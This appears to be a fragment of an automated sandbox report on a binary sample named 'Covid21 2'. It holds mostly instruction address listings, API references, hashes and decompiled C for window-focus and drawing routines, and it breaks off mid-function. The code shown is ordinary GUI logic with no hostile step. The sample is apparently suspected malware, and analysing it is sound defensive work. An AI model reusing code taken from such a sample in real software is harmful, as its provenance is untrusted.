                                  0x004088e1
                                  0x004088e3
                                  0x004088e5
                                  0x004088e7
                                  0x004088e9
                                  0x004088eb
                                  0x004088ed
                                  0x004088ef
                                  0x004088f1
                                  0x004088f3
                                  0x004088f5
                                  0x004088f7
                                  0x004088f9
                                  0x004088fb
                                  0x004088fd
                                  0x004088ff
                                  0x00408901
                                  0x00408903
                                  0x00408905
                                  0x00408907
                                  0x00408909
                                  0x0040890b
                                  0x0040890d
                                  0x0040890f
                                  0x00408911
                                  0x00408913
                                  0x00408915
                                  0x00408917
                                  0x00408919
                                  0x0040891b
                                  0x0040891d
                                  0x0040891f
                                  0x00408921
                                  0x00408923
                                  0x00408925
                                  0x00408927
                                  0x00408929
                                  0x0040892b
                                  0x0040892d
                                  0x0040892f
                                  0x00408931
                                  0x00408933
                                  0x00408935
                                  0x00408937
                                  0x00408939
                                  0x0040893b
                                  0x0040893d
                                  0x0040893f
                                  0x00408941
                                  0x00408943
                                  0x00408945
                                  0x00408947
                                  0x00408949
                                  0x0040894b
                                  0x0040894d
                                  0x0040894f
                                  0x00408951
                                  0x00408953
                                  0x00408955
                                  0x00408957
                                  0x00408959
                                  0x0040895b
                                  0x0040895d
                                  0x0040895f
                                  0x00408961
                                  0x00408963
                                  0x00408965
                                  0x00408967
                                  0x00408969
                                  0x0040896b
                                  0x0040896d
                                  0x0040896f
                                  0x00408971
                                  0x00408973
                                  0x00408975
                                  0x00408977
                                  0x00408979
                                  0x0040897b
                                  0x0040897d
                                  0x0040897f
                                  0x00408981
                                  0x00408983
                                  0x00408985
                                  0x00408987
                                  0x00408989
                                  0x0040898b
                                  0x0040898d
                                  0x0040898f
                                  0x00408991
                                  0x00408993
                                  0x00408995
                                  0x00408997
                                  0x00408999
                                  0x0040899b
                                  0x0040899d
                                  0x0040899f
                                  0x004089a1
                                  0x004089a3
                                  0x004089a5
                                  0x004089a7
                                  0x004089a9
                                  0x004089ab
                                  0x004089ad
                                  0x004089af
                                  0x004089b1
                                  0x004089b3
                                  0x004089b5
                                  0x004089b7
                                  0x004089b9
                                  0x004089bb
                                  0x004089bd
                                  0x004089bf
                                  0x004089c1
                                  0x004089c3
                                  0x004089c5
                                  0x004089c7
                                  0x004089c9
                                  0x004089cb
                                  0x004089cd
                                  0x004089cf
                                  0x004089d1
                                  0x004089d3
                                  0x004089d5
                                  0x004089d7
                                  0x004089d9
                                  0x004089db
                                  0x004089dd
                                  0x004089df
                                  0x004089e1
                                  0x004089e3
                                  0x004089e5
                                  0x004089e7
                                  0x004089e9
                                  0x004089eb
                                  0x004089ed
                                  0x004089ef
                                  0x004089f1
                                  0x004089f3
                                  0x004089f5
                                  0x004089f7
                                  0x004089f9
                                  0x004089fb
                                  0x004089fd
                                  0x004089ff
                                  0x00408a01
                                  0x00408a03
                                  0x00408a05
                                  0x00408a07
                                  0x00408a09
                                  0x00408a0b
                                  0x00408a0d
                                  0x00408a0f
                                  0x00408a11
                                  0x00408a13
                                  0x00408a15
                                  0x00408a17
                                  0x00408a19
                                  0x00408a1b
                                  0x00408a1d
                                  0x00408a1f
                                  0x00408a21
                                  0x00408a23
                                  0x00408a25
                                  0x00408a27
                                  0x00408a29
                                  0x00408a2b
                                  0x00408a2d
                                  0x00408a2f
                                  0x00408a31
                                  0x00408a33
                                  0x00408a35
                                  0x00408a37
                                  0x00408a39
                                  0x00408a3b
                                  0x00408a3d
                                  0x00408a3f
                                  0x00408a41
                                  0x00408a43
                                  0x00408a45
                                  0x00408a47
                                  0x00408a49
                                  0x00408a4b
                                  0x00408a4d
                                  0x00408a4f
                                  0x00408a51
                                  0x00408a53
                                  0x00408a55
                                  0x00408a57
                                  0x00408a59
                                  0x00408a5b
                                  0x00408a5d
                                  0x00408a5f
                                  0x00408a61
                                  0x00408a63
                                  0x00408a65
                                  0x00408a67
                                  0x00408a69
                                  0x00408a6b
                                  0x00408a6d
                                  0x00408a6f
                                  0x00408a71
                                  0x00408a73
                                  0x00408a75
                                  0x00408a77
                                  0x00408a79
                                  0x00408a7b
                                  0x00408a7d
                                  0x00408a7f
                                  0x00408a81
                                  0x00408a83
                                  0x00408a85
                                  0x00408a87
                                  0x00408a89
                                  0x00408a8b
                                  0x00408a8d
                                  0x00408a8f
                                  0x00408a91
                                  0x00408a93
                                  0x00408a95
                                  0x00408a97
                                  0x00408a99
                                  0x00408a9b
                                  0x00408a9d
                                  0x00408a9f
                                  0x00408aa1
                                  0x00408aa3
                                  0x00408aa5
                                  0x00408aa7
                                  0x00408aa9
                                  0x00408aab
                                  0x00408aad
                                  0x00408aaf
                                  0x00408ab1
                                  0x00408ab3
                                  0x00408ab5
                                  0x00408ab7
                                  0x00408ab9
                                  0x00408abb
                                  0x00408abd
                                  0x00408abf
                                  0x00408ac1
                                  0x00408ac3
                                  0x00408ac5
                                  0x00408ac7
                                  0x00408ac9
                                  0x00408acb
                                  0x00408acd
                                  0x00408acf
                                  0x00408ad1
                                  0x00408ad3
                                  0x00408ad5
                                  0x00408ad7
                                  0x00408ad9
                                  0x00408adb
                                  0x00408add
                                  0x00408adf
                                  0x00408ae1
                                  0x00408ae3
                                  0x00408ae5
                                  0x00408ae7
                                  0x00408ae9
                                  0x00408aeb
                                  0x00408aed
                                  0x00408aef
                                  0x00408af1
                                  0x00408af3
                                  0x00408af5
                                  0x00408af7
                                  0x00408af9
                                  0x00408afb
                                  0x00408afd
                                  0x00408aff
                                  0x00408b01
                                  0x00408b03
                                  0x00408b05
                                  0x00408b07
                                  0x00408b09
                                  0x00408b0b
                                  0x00408b0d
                                  0x00408b0f
                                  0x00408b11
                                  0x00408b13
                                  0x00408b15
                                  0x00408b17
                                  0x00408b19
                                  0x00408b1b
                                  0x00408b1d
                                  0x00408b1f
                                  0x00408b21
                                  0x00408b23
                                  0x00408b25
                                  0x00408b27
                                  0x00408b29
                                  0x00408b2b
                                  0x00408b2d
                                  0x00408b2f
                                  0x00408b31
                                  0x00408b33
                                  0x00408b35
                                  0x00408b37
                                  0x00408b39
                                  0x00408b3b
                                  0x00408b3d
                                  0x00408b3f
                                  0x00408b41
                                  0x00408b43
                                  0x00408b45
                                  0x00408b47
                                  0x00408b49
                                  0x00408b4b
                                  0x00408b4d
                                  0x00408b4f
                                  0x00408b51
                                  0x00408b53
                                  0x00408b55
                                  0x00408b57
                                  0x00408b59
                                  0x00408b5b
                                  0x00408b5d
                                  0x00408b5f
                                  0x00408b61
                                  0x00408b63
                                  0x00408b65
                                  0x00408b67
                                  0x00408b69
                                  0x00408b6b
                                  0x00408b6d
                                  0x00408b6f
                                  0x00408b71
                                  0x00408b73
                                  0x00408b75
                                  0x00408b77
                                  0x00408b79
                                  0x00408b7b
                                  0x00408b7d
                                  0x00408b7f
                                  0x00408b81
                                  0x00408b83
                                  0x00408b85
                                  0x00408b87
                                  0x00408b89
                                  0x00408b8b
                                  0x00408b8d
                                  0x00408b8f
                                  0x00408b91
                                  0x00408b93
                                  0x00408b95
                                  0x00408b97
                                  0x00408b99
                                  0x00408b9b
                                  0x00408b9d
                                  0x00408b9f
                                  0x00408ba1
                                  0x00408ba3
                                  0x00408ba5
                                  0x00408ba7
                                  0x00408ba9
                                  0x00408bab
                                  0x00408bad
                                  0x00408baf
                                  0x00408bb1
                                  0x00408bb3
                                  0x00408bb5
                                  0x00408bb7
                                  0x00408bb9
                                  0x00408bbb
                                  0x00408bbd
                                  0x00408bbf
                                  0x00408bc1
                                  0x00408bc3
                                  0x00408bc5
                                  0x00408bc7
                                  0x00408bc9
                                  0x00408bcb
                                  0x00408bcd
                                  0x00408bcf
                                  0x00408bd1
                                  0x00408bd3
                                  0x00408bd5
                                  0x00408bd7
                                  0x00408bd9
                                  0x00408bdb
                                  0x00408bdd
                                  0x00408bdf
                                  0x00408be1
                                  0x00408be3
                                  0x00408be5
                                  0x00408be7
                                  0x00408be9
                                  0x00408beb
                                  0x00408bed
                                  0x00408bef
                                  0x00408bf1
                                  0x00408bf3
                                  0x00408bf5
                                  0x00408bf7
                                  0x00408bf9
                                  0x00408bfb
                                  0x00408bfd
                                  0x00408bff
                                  0x00408c01
                                  0x00408c03
                                  0x00408c05
                                  0x00408c07
                                  0x00408c09
                                  0x00408c0b
                                  0x00408c0d
                                  0x00408c0f
                                  0x00408c11
                                  0x00408c13
                                  0x00408c15
                                  0x00408c17
                                  0x00408c19
                                  0x00408c1b
                                  0x00408c1d
                                  0x00408c1f
                                  0x00408c21
                                  0x00408c23
                                  0x00408c25
                                  0x00408c27
                                  0x00408c29
                                  0x00408c2b
                                  0x00408c2d
                                  0x00408c2f
                                  0x00408c31
                                  0x00408c33
                                  0x00408c35
                                  0x00408c37
                                  0x00408c39
                                  0x00408c3b
                                  0x00408c3d
                                  0x00408c3f
                                  0x00408c41
                                  0x00408c43
                                  0x00408c45
                                  0x00408c47
                                  0x00408c49
                                  0x00408c4b
                                  0x00408c4d
                                  0x00408c4f
                                  0x00408c51
                                  0x00408c53
                                  0x00408c55
                                  0x00408c57
                                  0x00408c59
                                  0x00408c5b
                                  0x00408c5d
                                  0x00408c5f
                                  0x00408c61
                                  0x00408c63
                                  0x00408c65
                                  0x00408c67
                                  0x00408c69
                                  0x00408c6b
                                  0x00408c6d
                                  0x00408c6f
                                  0x00408c71
                                  0x00408c73
                                  0x00408c75
                                  0x00408c77
                                  0x00408c79
                                  0x00408c7b
                                  0x00408c7d
                                  0x00408c7f
                                  0x00408c81
                                  0x00408c83
                                  0x00408c85
                                  0x00408c87
                                  0x00408c89
                                  0x00408c8b
                                  0x00408c8d
                                  0x00408c8f
                                  0x00408c91
                                  0x00408c93
                                  0x00408c95
                                  0x00408c97
                                  0x00408c99
                                  0x00408c9b
                                  0x00408c9d
                                  0x00408c9f
                                  0x00408ca1
                                  0x00408ca3
                                  0x00408ca5
                                  0x00408ca7
                                  0x00408ca9
                                  0x00408cab
                                  0x00408cad
                                  0x00408caf
                                  0x00408cb1
                                  0x00408cb3
                                  0x00408cb5
                                  0x00408cb7
                                  0x00408cb9
                                  0x00408cbb
                                  0x00408cbd
                                  0x00408cbf
                                  0x00408cc1
                                  0x00408cc3
                                  0x00408cc5
                                  0x00408cc7
                                  0x00408cc9
                                  0x00408ccb
                                  0x00408ccd
                                  0x00408ccf
                                  0x00408cd1
                                  0x00408cd3
                                  0x00408cd5
                                  0x00408cd7
                                  0x00408cd9
                                  0x00408cdb
                                  0x00408cdd
                                  0x00408cdf
                                  0x00408ce1
                                  0x00408ce3
                                  0x00408ce5
                                  0x00408ce7
                                  0x00408ce9
                                  0x00408ceb
                                  0x00408ced
                                  0x00408cef
                                  0x00408cf1
                                  0x00408cf3
                                  0x00408cf5
                                  0x00408cf7
                                  0x00408cf9
                                  0x00408cfb
                                  0x00408cfd
                                  0x00408cff
                                  0x00408d01
                                  0x00408d03
                                  0x00408d05
                                  0x00408d07
                                  0x00408d09
                                  0x00408d0b
                                  0x00408d0d
                                  0x00408d0f
                                  0x00408d11
                                  0x00408d13
                                  0x00408d15
                                  0x00408d17
                                  0x00408d19
                                  0x00408d1b
                                  0x00408d1d
                                  0x00408d1f
                                  0x00408d21
                                  0x00408d23
                                  0x00408d25
                                  0x00408d27
                                  0x00408d29
                                  0x00408d2b
                                  0x00408d2d
                                  0x00408d2f
                                  0x00408d31
                                  0x00408d33
                                  0x00408d35
                                  0x00408d37
                                  0x00408d39
                                  0x00408d3b
                                  0x00408d3d
                                  0x00408d3f
                                  0x00408d41
                                  0x00408d43
                                  0x00408d45
                                  0x00408d47
                                  0x00408d49
                                  0x00408d4b
                                  0x00408d4d
                                  0x00408d4f
                                  0x00408d51
                                  0x00408d53
                                  0x00408d55
                                  0x00408d57
                                  0x00408d59
                                  0x00408d5b
                                  0x00408d5d
                                  0x00408d5f
                                  0x00408d61
                                  0x00408d63
                                  0x00408d65
                                  0x00408d67
                                  0x00408d69
                                  0x00408d6b
                                  0x00408d6d
                                  0x00408d6f
                                  0x00408d71
                                  0x00408d73
                                  0x00408d75
                                  0x00408d77
                                  0x00408d79
                                  0x00408d7b
                                  0x00408d7d
                                  0x00408d7f
                                  0x00408d81
                                  0x00408d83
                                  0x00408d85
                                  0x00408d87
                                  0x00408d89
                                  0x00408d8b
                                  0x00408d8d
                                  0x00408d8f
                                  0x00408d91
                                  0x00408d93
                                  0x00408d95
                                  0x00408d97
                                  0x00408d99
                                  0x00408d9b
                                  0x00408d9d
                                  0x00408d9f
                                  0x00408da1
                                  0x00408da3
                                  0x00408da5
                                  0x00408da7
                                  0x00408da9
                                  0x00408dab
                                  0x00408dad
                                  0x00408daf
                                  0x00408db1
                                  0x00408db3
                                  0x00408db5
                                  0x00408db7
                                  0x00408db9
                                  0x00408dbb
                                  0x00408dbd
                                  0x00408dbf
                                  0x00408dc1
                                  0x00408dc3
                                  0x00408dc5
                                  0x00408dc7
                                  0x00408dc9
                                  0x00408dcb
                                  0x00408dcd
                                  0x00408dcf
                                  0x00408dd1
                                  0x00408dd3
                                  0x00408dd5
                                  0x00408dd7
                                  0x00408dd9
                                  0x00408ddb
                                  0x00408ddd
                                  0x00408ddf
                                  0x00408de1
                                  0x00408de3
                                  0x00408de5
                                  0x00408de7
                                  0x00408de9
                                  0x00408deb
                                  0x00408ded
                                  0x00408def
                                  0x00408df1
                                  0x00408df3
                                  0x00408df5
                                  0x00408df7
                                  0x00408df9
                                  0x00408dfb
                                  0x00408dfd
                                  0x00408dff
                                  0x00408e01
                                  0x00408e03
                                  0x00408e05
                                  0x00408e07
                                  0x00408e09
                                  0x00408e0b
                                  0x00408e0d
                                  0x00408e0f
                                  0x00408e11
                                  0x00408e13
                                  0x00408e15
                                  0x00408e17
                                  0x00408e19
                                  0x00408e1b
                                  0x00408e1d
                                  0x00408e1f
                                  0x00408e21
                                  0x00408e23
                                  0x00408e25
                                  0x00408e27
                                  0x00408e29
                                  0x00408e2b
                                  0x00408e2d
                                  0x00408e2f
                                  0x00408e31
                                  0x00408e33
                                  0x00408e35
                                  0x00408e37
                                  0x00408e39
                                  0x00408e3b
                                  0x00408e3d
                                  0x00408e3f
                                  0x00408e41
                                  0x00408e43
                                  0x00408e45
                                  0x00408e47
                                  0x00408e49
                                  0x00408e4b
                                  0x00408e4d
                                  0x00408e4f
                                  0x00408e51
                                  0x00408e53
                                  0x00408e55
                                  0x00408e57
                                  0x00408e59
                                  0x00408e5b
                                  0x00408e5d
                                  0x00408e5f
                                  0x00408e61
                                  0x00408e63
                                  0x00408e65
                                  0x00408e67
                                  0x00408e69
                                  0x00408e6b
                                  0x00408e6d
                                  0x00408e6f
                                  0x00408e71
                                  0x00408e73
                                  0x00408e75
                                  0x00408e77
                                  0x00408e79
                                  0x00408e7b
                                  0x00408e7d
                                  0x00408e7f
                                  0x00408e81
                                  0x00408e83
                                  0x00408e85
                                  0x00408e87
                                  0x00408e89
                                  0x00408e8b
                                  0x00408e8d
                                  0x00408e8f
                                  0x00408e91
                                  0x00408e93
                                  0x00408e95
                                  0x00408e97
                                  0x00408e99
                                  0x00408e9b
                                  0x00408e9d
                                  0x00408e9f
                                  0x00408ea1
                                  0x00408ea3
                                  0x00408ea5
                                  0x00408ea7
                                  0x00408ea9
                                  0x00408eab
                                  0x00408ead
                                  0x00408eaf
                                  0x00408eb1
                                  0x00408eb3
                                  0x00408eb5
                                  0x00408eb7
                                  0x00408eb9
                                  0x00408ebb
                                  0x00408ebd
                                  0x00408ebf
                                  0x00408ec1
                                  0x00408ec3
                                  0x00408ec5
                                  0x00408ec7
                                  0x00408ec9
                                  0x00408ecb
                                  0x00408ecd
                                  0x00408ecf
                                  0x00408ed1
                                  0x00408ed3
                                  0x00408ed5
                                  0x00408ed7
                                  0x00408ed9
                                  0x00408edb
                                  0x00408edd
                                  0x00408edf
                                  0x00408ee1
                                  0x00408ee3
                                  0x00408ee5
                                  0x00408ee7
                                  0x00408ee9
                                  0x00408eeb
                                  0x00408eed
                                  0x00408eef
                                  0x00408ef1
                                  0x00408ef3
                                  0x00408ef5
                                  0x00408ef7
                                  0x00408ef9
                                  0x00408efb
                                  0x00408efd
                                  0x00408eff
                                  0x00408f01
                                  0x00408f03
                                  0x00408f05
                                  0x00408f07
                                  0x00408f09
                                  0x00408f0b
                                  0x00408f0d
                                  0x00408f0f
                                  0x00408f11
                                  0x00408f13
                                  0x00408f15
                                  0x00408f17
                                  0x00408f19
                                  0x00408f1b
                                  0x00408f1d
                                  0x00408f1f
                                  0x00408f21
                                  0x00408f23
                                  0x00408f25
                                  0x00408f27
                                  0x00408f29
                                  0x00408f2b
                                  0x00408f2d
                                  0x00408f2f
                                  0x00408f31
                                  0x00408f33
                                  0x00408f35
                                  0x00408f37
                                  0x00408f39
                                  0x00408f3b
                                  0x00408f3d
                                  0x00408f3f
                                  0x00408f41
                                  0x00408f43
                                  0x00408f45
                                  0x00408f47
                                  0x00408f49
                                  0x00408f4b
                                  0x00408f4d
                                  0x00408f4f
                                  0x00408f51
                                  0x00408f53
                                  0x00408f55
                                  0x00408f57
                                  0x00408f59
                                  0x00408f5b
                                  0x00408f5d
                                  0x00408f5f
                                  0x00408f61
                                  0x00408f63
                                  0x00408f65
                                  0x00408f67
                                  0x00408f69
                                  0x00408f6b
                                  0x00408f6d
                                  0x00408f6f
                                  0x00408f71
                                  0x00408f73
                                  0x00408f75
                                  0x00408f77
                                  0x00408f79
                                  0x00408f7b
                                  0x00408f7d
                                  0x00408f7f
                                  0x00408f81
                                  0x00408f83
                                  0x00408f85
                                  0x00408f87
                                  0x00408f89
                                  0x00408f8b
                                  0x00408f8d
                                  0x00408f8f
                                  0x00408f91
                                  0x00408f93
                                  0x00408f95
                                  0x00408f97
                                  0x00408f99
                                  0x00408f9b
                                  0x00408f9d
                                  0x00408f9f
                                  0x00408fa1
                                  0x00408fa3
                                  0x00408fa5
                                  0x00408fa7
                                  0x00408fa9
                                  0x00408fab
                                  0x00408fad
                                  0x00408faf
                                  0x00408fb1
                                  0x00408fb3
                                  0x00408fb5
                                  0x00408fb7
                                  0x00408fb9
                                  0x00408fbb
                                  0x00408fbd
                                  0x00408fbf
                                  0x00408fc1
                                  0x00408fc3
                                  0x00408fc5
                                  0x00408fc7
                                  0x00408fc9
                                  0x00408fcb
                                  0x00408fcd
                                  0x00408fcf
                                  0x00408fd1
                                  0x00408fd3
                                  0x00408fd5
                                  0x00408fd7
                                  0x00408fd9
                                  0x00408fdb
                                  0x00408fdd
                                  0x00408fdf
                                  0x00408fe1
                                  0x00408fe3
                                  0x00408fe5
                                  0x00408fe7
                                  0x00408fe9
                                  0x00408feb
                                  0x00408fed
                                  0x00408fef
                                  0x00408ff1
                                  0x00408ff3
                                  0x00408ff5
                                  0x00408ff7
                                  0x00408ff9
                                  0x00408ffb
                                  0x00408ffd
                                  0x00408fff
                                  0x00409001
                                  0x00409003
                                  0x00409006
                                  0x00409006
                                  0x00409007
                                  0x0040905a
                                  0x0040905a
                                  0x0040905b
                                  0x0040905c
                                  0x004090cd
                                  0x004090cd
                                  0x004090ce
                                  0x004090d0
                                  0x004090d3
                                  0x004090d4
                                  0x004090d6
                                  0x004090d8
                                  0x004090d9
                                  0x004090d9
                                  0x004090db
                                  0x004090e2
                                  0x004090e3
                                  0x004090e6
                                  0x004090ea
                                  0x004090ec
                                  0x004090ec
                                  0x004090ec
                                  0x004090ec
                                  0x004090ed
                                  0x004090ef
                                  0x0040911d
                                  0x0040911d
                                  0x00000000
                                  0x00000000
                                  0x0040911f
                                  0x00409128
                                  0x00409128
                                  0x0040912f
                                  0x00409131
                                  0x00000000
                                  0x00000000
                                  0x00409133
                                  0x00409137
                                  0x0040913a
                                  0x0040913a
                                  0x00409122
                                  0x00409122
                                  0x00000000
                                  0x00000000
                                  0x00409122
                                  0x00409121
                                  0x00000000
                                  0x00409121
                                  0x004090f1
                                  0x004090f2
                                  0x004090f3
                                  0x004090f4
                                  0x004090f9
                                  0x004090fa
                                  0x004090fa
                                  0x004090fb
                                  0x004090fc
                                  0x004090fe
                                  0x00409100
                                  0x00409100
                                  0x00409104
                                  0x00409104
                                  0x0040910b
                                  0x0040910c
                                  0x0040910d
                                  0x00409112
                                  0x00409114
                                  0x00409116
                                  0x00000000
                                  0x0040911c
                                  0x0040905e
                                  0x004090a1
                                  0x004090a1
                                  0x004090a4
                                  0x004090a4
                                  0x004090a6
                                  0x004090a7
                                  0x004090a8
                                  0x00000000
                                  0x00000000
                                  0x004090aa
                                  0x004090ac
                                  0x004090ad
                                  0x004090ae
                                  0x004090ae
                                  0x004090b1
                                  0x004090b3
                                  0x004090b3
                                  0x004090b3
                                  0x004090b6
                                  0x00000000
                                  0x00000000
                                  0x004090b8
                                  0x004090b9
                                  0x004090ba
                                  0x004090bc
                                  0x004090bd
                                  0x00000000
                                  0x00000000
                                  0x004090bf
                                  0x004090c0
                                  0x004090c1
                                  0x004090c2
                                  0x004090c3
                                  0x004090c3
                                  0x004090c4
                                  0x004090c6
                                  0x004090c6
                                  0x004090c8
                                  0x004090c8
                                  0x004090c9
                                  0x00000000
                                  0x00000000
                                  0x004090cc
                                  0x00000000
                                  0x004090cc
                                  0x00409060
                                  0x00409063
                                  0x00000000
                                  0x00000000
                                  0x00409065
                                  0x00409067
                                  0x0040906a
                                  0x0040906b
                                  0x0040906c
                                  0x0040906d
                                  0x0040906f
                                  0x00409072
                                  0x00409073
                                  0x00409074
                                  0x00409075
                                  0x00409075
                                  0x00409076
                                  0x00409078
                                  0x00000000
                                  0x00000000
                                  0x0040907a
                                  0x0040907b
                                  0x0040907e
                                  0x0040907f
                                  0x0040907f
                                  0x00409081
                                  0x00000000
                                  0x00000000
                                  0x00409083
                                  0x00409084
                                  0x00409085
                                  0x00000000
                                  0x00000000
                                  0x00409088
                                  0x0040908c
                                  0x0040908c
                                  0x0040908d
                                  0x00409090
                                  0x00409091
                                  0x00409092
                                  0x00409094
                                  0x00409095
                                  0x0040909a
                                  0x0040909d
                                  0x0040909e
                                  0x0040909f
                                  0x004090a0
                                  0x00000000
                                  0x004090a0
                                  0x0040900a
                                  0x0040900b
                                  0x00000000
                                  0x00000000
                                  0x0040900d
                                  0x0040900e
                                  0x00000000
                                  0x00000000
                                  0x00409010
                                  0x00409011
                                  0x00409013
                                  0x00409014
                                  0x00409014
                                  0x0040901b
                                  0x00000000
                                  0x00000000
                                  0x0040901d
                                  0x00000000
                                  0x00000000
                                  0x0040901f
                                  0x0040901f
                                  0x00409021
                                  0x00409022
                                  0x00000000
                                  0x00000000
                                  0x00409024
                                  0x00409025
                                  0x00409026
                                  0x0040902a
                                  0x0040902d
                                  0x00409031
                                  0x00409037
                                  0x0040903b
                                  0x0040903c
                                  0x0040903e
                                  0x0040903e
                                  0x00409040
                                  0x00409041
                                  0x00000000
                                  0x00000000
                                  0x00409043
                                  0x00000000
                                  0x00000000
                                  0x00409045
                                  0x00409047
                                  0x0040904a
                                  0x00409052
                                  0x00000000
                                  0x00000000
                                  0x00409054
                                  0x00409055
                                  0x00409056
                                  0x00409058
                                  0x00409059
                                  0x00409059
                                  0x00000000

                                  APIs
                                  • sprintf.MSVCRT ref: 00407F25
                                  • GetPropA.USER32(00000000,?), ref: 00407F40
                                  • GetPropA.USER32(00404DB1,?), ref: 00407F62
                                  • HeapFree.KERNEL32(00000000,?,?,00000000,00000010), ref: 00407F7B
                                  • RtlAllocateHeap.NTDLL(00000008,00000028), ref: 00407FB3
                                  • RtlAllocateHeap.NTDLL(00000008,00000018), ref: 00407FD4
                                  • SetPropA.USER32(00404DB1,?,00000000), ref: 00407FE0
                                  • SetWindowLongA.USER32(00404DB1,000000FC,00407E1A), ref: 00407FEE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: HeapProp$Allocate$FreeLongWindowsprintf
                                  • String ID: PB_GadgetStack_%i
                                  • API String ID: 765838127-1190326050
                                  • Opcode ID: e5eb7ea4f734b695530acc5a332d78697251fa88f1f3ffbef3ff32b69048928e
                                  • Instruction ID: 0079b016ce4f4140cb49a2b1502a0785ed6019fc8fd11791dd2fa74e733ae66f
                                  • Opcode Fuzzy Hash: e5eb7ea4f734b695530acc5a332d78697251fa88f1f3ffbef3ff32b69048928e
                                  • Instruction Fuzzy Hash: 4B3124B0904705AFC720DF24D984A56BBF8FB08311F10892EE496A76A0D778A954CF9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405C70, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78windowstringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E00405C70(intOrPtr _a4) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				struct HWND__* _v16;
				struct HWND__* _v20;
				struct HWND__* _v24;
				char _v76;
				void* _t26;
				struct HWND__* _t38;
				intOrPtr* _t40;
				struct HWND__* _t41;

				_v8 = GetActiveWindow();
				_t38 = GetFocus();
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				if(IsChild(_v8, _t38) == 0) {
					_v24 = 0;
					L8:
					_push( &_v24);
					if(_a4 == 0) {
						_t40 =  *0x40a85c; // 0x72e7a980
						_t26 =  *_t40(_v8, 0x405bb5);
						if(_v16 == 0) {
							L14:
							return _t26;
						}
						return  *_t40(_v8, 0x405bb5,  &_v24);
					}
					_t26 =  *0x40a85c(_v8, E00405C1A);
					if(_v12 != 0 || _v20 == 0) {
						goto L14;
					} else {
						return SetFocus(_v20);
					}
				}
				_v24 = _t38;
				_t41 = _t38;
				if(_t38 == 0) {
					goto L8;
				} else {
					goto L2;
				}
				do {
					L2:
					GetClassNameA(_t41,  &_v76, 0x32);
					if(strcmp( &_v76, "MDI_ChildClass") == 0) {
						_v8 = _t41;
						if(_t38 == _t41) {
							_v24 = 0;
						}
					}
					_t41 = GetParent(_t41);
				} while (_t41 != 0);
				goto L8;
			}













                                  0x00405c7f
                                  0x00405c88
                                  0x00405c90
                                  0x00405c93
                                  0x00405c96
                                  0x00405ca1
                                  0x00405ce6
                                  0x00405ce9
                                  0x00405cef
                                  0x00405cf0
                                  0x00405d15
                                  0x00405d24
                                  0x00405d29
                                  0x00405d39
                                  0x00405d39
                                  0x00405d39
                                  0x00000000
                                  0x00405d33
                                  0x00405cfa
                                  0x00405d03
                                  0x00000000
                                  0x00405d0a
                                  0x00000000
                                  0x00405d0d
                                  0x00405d03
                                  0x00405ca5
                                  0x00405ca8
                                  0x00405caa
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405cac
                                  0x00405cac
                                  0x00405cb3
                                  0x00405ccb
                                  0x00405ccf
                                  0x00405cd2
                                  0x00405cd4
                                  0x00405cd4
                                  0x00405cd2
                                  0x00405cde
                                  0x00405ce0
                                  0x00000000

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: Focus$ActiveChildClassNameParentWindowstrcmp
                                  • String ID: MDI_ChildClass
                                  • API String ID: 1701595447-1946758919
                                  • Opcode ID: 988777d83d435900f4e6347359a80255c0a00559c1b171bf8b6f6dc761034bc8
                                  • Instruction ID: a705aa9bed059d8bd142721d9e0f0f0abb2c12223c0bddd2eb61c98d35858e50
                                  • Opcode Fuzzy Hash: 988777d83d435900f4e6347359a80255c0a00559c1b171bf8b6f6dc761034bc8
                                  • Instruction Fuzzy Hash: CE212172D04719EBDF11AFA59D888AFBBB8EF44301B24843BE501B2250D7384E51DF5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004056EF, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 320windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 46%
                                  			E004056EF(struct HWND__* _a4, intOrPtr _a8, struct HDC__* _a12, signed int _a16) {
				signed int _v8;
				struct HWND__* _v12;
				struct tagRECT _v28;
				signed int* _t95;
				void* _t96;
				struct HWND__* _t97;
				signed int _t98;
				intOrPtr _t99;
				struct HBRUSH__* _t100;
				struct HBRUSH__* _t102;
				signed short _t110;
				signed short _t111;
				signed short _t112;
				signed short _t113;
				void* _t118;
				unsigned int _t120;
				long _t123;
				struct HWND__* _t125;
				void* _t131;
				void* _t134;
				struct HBRUSH__* _t137;
				struct HBRUSH__* _t140;
				void* _t142;
				void* _t145;
				struct HWND__* _t147;
				intOrPtr* _t148;
				struct HBRUSH__* _t149;
				struct HBRUSH__* _t150;
